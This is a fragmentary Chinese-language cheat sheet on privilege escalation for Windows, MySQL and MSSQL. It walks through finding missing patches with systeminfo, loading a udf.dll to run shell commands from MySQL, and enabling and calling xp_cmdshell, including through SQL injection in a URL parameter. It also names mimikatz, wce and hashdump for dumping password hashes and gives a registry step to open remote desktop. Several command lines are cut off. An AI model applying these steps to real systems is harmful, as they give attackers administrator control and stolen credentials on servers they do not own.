水平权限提升
获得其他用户的权限
垂直权限提升
由普通的或者权限不完整的账号提升为拥有完整权限的管理员账号或者root权限
操作系统漏洞提权
systeminfo
查看系统信息补丁编号
1 | C:\Users\Ni7eipr>systeminfo |
检查补丁情况命令
1 | systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191 |
1 | systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280 |
执行结果
根据结果网上寻找漏洞进行利用
效果
第三方服务提权
ftp
mysql
udf提权
UDF 就是 User defined Function
mysql如何编写udf
UDF Compiling and Installing
上传一个udf.dll
- 若mysql小于5.1版本
C:\WINDOWS\udf.dll 或 C:\WINDOWS\system32\udf.dll 大于mysql5.1版本
%mysql%\plugin\udf.dll用 select @@plugin_dir 查询plugin路径
默认 C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin\udf.dll
使用sql语句创建功能函数
1 | CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll' |
使用sql语句
1 | select shell(‘cmd','whoami') |
删除创建的函数
1 | drop function shell; |
直接使用udf.php
mof提权
mssql
通过xp_cmdshell组件执行系统命令
1 | index.aspx?id=1;EXEC |
如果xp_cmdshell被关闭
执行开启xp_cmdshell1
2
3
4
5
6
7USE master
EXEC sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'show advanced options', 0
RECONFIGURE WITH OVERRIDE
导出主机密码
- mimkatz
- getpass
导出主机密码hash
- wce
- gethash
- hashdump
hash解密网站
http://www.objectif-securite.ch/ophcrack.php
开启3389
1 | Windows Registry Editor Version 5.00 |